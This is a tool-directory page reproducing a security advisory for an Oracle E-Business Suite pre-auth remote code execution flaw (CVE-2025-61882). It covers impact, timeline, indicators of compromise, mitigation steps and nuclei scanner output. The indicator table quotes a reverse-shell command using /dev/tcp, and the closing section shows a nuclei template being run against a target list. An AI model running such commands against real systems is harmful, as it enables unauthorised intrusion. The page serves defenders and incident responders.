Skip to content
KitploitKITPLOIT
ToolsExploitsBlog
Log in
Submit
ToolsExploitsBlog
Submit

Hacking, PenTest, and Cybersecurity Tools for Your Security Arsenal!

Kitploit is a directory of hacking, cybersecurity, and pentesting tools. Discover the latest project updates to find vulnerabilities, analyze systems, automate testing, and strengthen your security.

FeedsContactPrivacy© 2026 Kitploit

Tool Directory

Categories

View all categories
Loading categories
Blackash-CVE-2025-61882 — Provides a detailed CVE-2025-61882 advisory with technical analysis, IOCs, detection queries, and a nuclei-based exploit template for Oracle E-Business Suite pre-auth RCE. | Kitploit
Tools/GitHubGitHub/222dff-afk/blackash-cve-2025-61882
Vulnerability AnalysisExploitationWeb SecurityPenetration TestingThreat IntelligenceIncident Response
GitHub222dff-afk/blackash-cve-2025-61882

Blackash-CVE-2025-61882

Provides a detailed CVE-2025-61882 advisory with technical analysis, IOCs, detection queries, and a nuclei-based exploit template for Oracle E-Business Suite pre-auth RCE.

View Repository
2150 years agoNot yet reviewed

Most Popular

View all →

Discover the most used tools by our community.

Explore all tools

Browse our collection of tools

View all tools →
Share

🛡️🚨 CVE‑2025‑61882 — Critical Pre‑Auth Remote Code Execution in Oracle E‑Business Suite (EBS) 🚨🛡️

Short summary: Critical pre‑auth remote code execution in Oracle E‑Business Suite (EBS) — affects 12.2.3 → 12.2.14, CVSS 9.8, actively exploited in the wild (ransom/ extortion activity reported). ([oracle.com][1])


📌 Quick facts (table)

FieldDetails
🆔 CVECVE‑2025‑61882
🧾 Product / ComponentOracle E‑Business Suite (EBS) — Concurrent Processing / BI Publisher integration
📦 Affected versions12.2.3 → 12.2.14
🔢 CVSS (v3.1)9.8 (AV:N/AC:L/PR:N/UI:N/C:H/I:H/A:H)
⚠️ TypeRemote Code Execution (RCE) — no authentication required
🔥 Exploited in the wildYes — mass exploitation / extortion campaigns reported
📅 Disclosure / timelineOctober 2025 (vendor advisory + public writeups). ([oracle.com][1])

(Above consolidated from vendor advisory, NVD/CISA, and multiple vendor analyses.) ([oracle.com][1])


💥 Impact (table)

Impact areaWhat it means
🔓 ConfidentialityAttackers can read sensitive HR/finance/ERP data
🛠️ IntegrityAttackers can modify records, create backdoors or alter configurations
⚡ AvailabilityAttackers can disrupt services, execute ransomware or destroy backups
🧭 Risk levelExtreme — pre‑auth RCE on critical ERP system → possible full domain pivot

References reporting high‑impact exploitation and ransomware linkage. ([Rapid7][2])


🛠️ Technical summary (concise)

  • Vector: HTTP/HTTPS requests to exposed EBS web endpoints trigger a vulnerability chain in the Concurrent Processing / BI Publisher integration leading to remote code execution. ([oracle.com][1])
  • Complexity: Low (no authentication, no user interaction). ([nvd.nist.gov][3])
  • Observed payloads: reverse shell patterns, web shells, dropped scripts used for data exfiltration and extortion. ([Rapid7][2])

🕵️‍♀️ Indicators of Compromise (IOCs) — examples (table)

Oracle and incident responders published IOCs; below are representative examples reported in advisories and vendor writeups. Hunt for these patterns in logs and endpoints. ([oracle.com][1])

TypeExample
🌐 IPs (observed)200.107.207.26, 185.181.60.11 (example addresses reported)
🧾 Command patternsh -c /bin/bash -i >& /dev/tcp/<ip>/<port> 0>&1 (reverse shell)
🗂️ File hashesSeveral SHA‑256 hashes for suspected exploit scripts (see vendor advisory for full list)
🕳️ ArtifactsUnexpected web shells, new cronjobs, suspicious outbound connections to unusual IPs/ports

If you want the full IOC list (IPs, full hashes, filenames) I can paste it here — say “paste IOCs”. (No links.)


🧭 Timeline (compact)

DateEvent
Aug 9, 2025Earliest reported real‑world exploitation activity (vendor telemetry). ([crowdstrike.com][4])
Early Oct 2025Oracle issued security alert / patch availability for EBS. ([oracle.com][1])
Oct 6–7, 2025CISA added the CVE to its Known Exploited Vulnerabilities (KEV) catalog (federal agencies guidance, due date for mitigation). ([cisa.gov][5])
Oct 2025 (ongoing)Multiple vendor writeups and mass‑exploit reports (CrowdStrike, Rapid7, Tenable, etc.). ([crowdstrike.com][4])

✅ Immediate recommended actions (step table)

PriorityActionNotes / Sample specifics
1️⃣ CriticalPatch affected EBS instancesApply Oracle’s Security Alert patches for versions 12.2.3–12.2.14 immediately. ([oracle.com][1])
2️⃣ HighIsolate / restrict access to EBS web endpointsBlock Internet‑facing HTTP/HTTPS to EBS; allow only trusted admin IPs or VPN.
3️⃣ HighEnable/adjust WAF rulesDeploy vendor/community WAF signatures for the exploit patterns; block suspicious payloads. ([Rapid7][2])
4️⃣ HighHunt & detectSearch logs for reverse shell commands, abnormal file writes, and outbound connections to IOCs.
5️⃣ IncidentContain & respond if compromise foundIsolate host, preserve forensic evidence, change credentials, rebuild from clean backups.
6️⃣ PolicyReport & notifyIf you’re in scope of regulatory/contractual requirements, notify stakeholders and authorities per policy (CISA/KEV guidance may apply). ([nvd.nist.gov][3])

💀 Exploits :

┌──(kali㉿kali)-[~]
└─$ nuclei -u http://10.10.10.10:8000 -t CVE-2025-61882.yaml                                                                                                  

                     __     _
   ____  __  _______/ /__  (_)
  / __ \/ / / / ___/ / _ \/ /
 / / / / /_/ / /__/ /  __/ /
/_/ /_/\__,_/\___/_/\___/_/   v3.4.10

                projectdiscovery.io

[INF] Current nuclei version: v3.4.10 (latest)
[INF] Current nuclei-templates version: v10.2.9 (latest)
[INF] New templates added in latest release: 182
[INF] Templates loaded for current scan: 1
[WRN] Loading 1 unsigned templates for scan. Use with caution.
[INF] Targets loaded for current scan: 1
[CVE-2025-61882:last_modified_date] [http] [critical] http://10.10.10.10:8000 ["Wed, 20 Aug 2025 08:20:09 GMT"]
[INF] Scan completed in 485.722955ms. 1 matches found.
                                                                                                                                                                                                                                           
┌──(kali㉿kali)-[~]
└─$ nuclei -l targets.txt -t CVE-2025-61882.yaml
Download Tool